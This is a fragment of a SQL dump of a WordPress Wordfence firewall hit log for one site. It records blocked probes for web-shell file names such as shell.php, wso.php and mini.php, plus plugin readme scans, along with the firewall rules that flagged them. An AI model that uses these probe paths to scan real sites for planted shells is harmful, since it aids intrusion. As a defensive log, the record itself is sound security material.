(50400, 1711237034.074787, 1711237033.761700, '\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/style.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0eWxlLnBocA==","category":"brute-force","ssl":1}'),
(50298, 1711080775.535500, 1711080775.248400, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-2019.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLTIwMTkucGhw","category":"brute-force","ssl":1}'),
(50581, 0.000000, 1711671370.692132, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇÖ©', 0, 503, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50582, 1711672820.223940, 1711672819.792900, '\0\0\0\0\0\0\0\0\0\0ÿÿYlmk', 0, 200, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/gotmls/readme.txt', NULL, 'Mozilla/5.0 (iPad; CPU OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.77 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50592, 1711720361.806990, 1711720361.393800, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œ@', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvYWJvdXQucGhw","category":"brute-force","ssl":1}'),
(50578, 1711655540.398103, 1711655539.806900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50583, 1711672820.223599, 1711672819.792900, '\0\0\0\0\0\0\0\0\0\0ÿÿYlmk', 0, 200, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/gotmls/readme.txt', NULL, 'Mozilla/5.0 (iPad; CPU OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.77 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50607, 1711731989.090282, 1711731988.790300, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///radio.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vcmFkaW8ucGhw","category":"brute-force","ssl":1}'),
(50591, 1711720380.473384, 1711720380.066700, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œ@', 0, 403, 0, 0, 0, 'https://happythinking.com/cgi-bin/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NnaS1iaW4vYWJvdXQucGhw","category":"brute-force","ssl":1}'),
(50818, 1712000456.204017, 1712000455.616600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/plugins.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMucGhw","category":"brute-force","ssl":1}'),
(51988, 1712689444.188006, 1712689443.879600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(50932, 1712082407.805261, 1712082407.192700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-login.php?action=register', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(50931, 1712082413.713490, 1712082413.176600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/404.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"LzQwNC5waHA=","category":"brute-force","ssl":1}'),
(51749, 1712368257.589117, 1712368257.219000, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wpstorecart/readme.txt', NULL, 'Mozilla/5.0 (iPod touch; CPU iPhone 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 YaBrowser/24.1.1.655 Mobile/15E148 Safari/605.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHN0b3JlY2FydC9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHN0b3JlY2FydC9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51724, 1712368229.434003, 1712368229.014700, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/asset-manager/readme.txt', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:85.0) Gecko/20100101 Firefox/85.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3NldC1tYW5hZ2VyL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3NldC1tYW5hZ2VyL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(50917, 1712082530.483751, 1712082529.457700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/makeasmtp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21ha2Vhc210cC5waHA=","category":"brute-force","ssl":1}'),
(50930, 1712082440.145354, 1712082439.631900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/updates.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZGF0ZXMucGhw","category":"brute-force","ssl":1}'),
(51991, 1712689422.759685, 1712689422.380700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/wso.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzby5waHA=","category":"brute-force","ssl":1}'),
(51933, 1712637511.272245, 1712637510.926700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/mini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21pbmkucGhw","category":"brute-force","ssl":1}'),
(52059, 1712762257.817057, 1712762257.356300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-conflg.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbmZsZy5waHA=","category":"brute-force","ssl":1}'),
(51986, 1712689468.399108, 1712689467.984400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/atomlib.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F0b21saWIucGhw","category":"brute-force","ssl":1}'),
(51941, 1712637358.151455, 1712637357.755900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/makeasmtp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21ha2Vhc210cC5waHA=","category":"brute-force","ssl":1}'),
(51985, 1712689478.358833, 1712689477.337500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(51942, 1712637334.203778, 1712637333.768300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(51943, 1712637322.218012, 1712637321.898500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/ws.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzLnBocA==","category":"brute-force","ssl":1}'),
(51944, 1712637310.942704, 1712637310.495600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/shell.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NoZWxsLnBocA==","category":"brute-force","ssl":1}');
INSERT INTO `wpou_wfhits` VALUES
(51984, 1712689488.115223, 1712689487.687300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/simple.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(51945, 1712637300.024732, 1712637299.675600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/as.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FzLnBocA==","category":"brute-force","ssl":1}'),
(51946, 1712637287.370721, 1712637286.890600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/ini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luaS5waHA=","category":"brute-force","ssl":1}'),
(52060, 1712762230.115525, 1712762229.689400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLnBocA==","category":"brute-force","ssl":1}'),
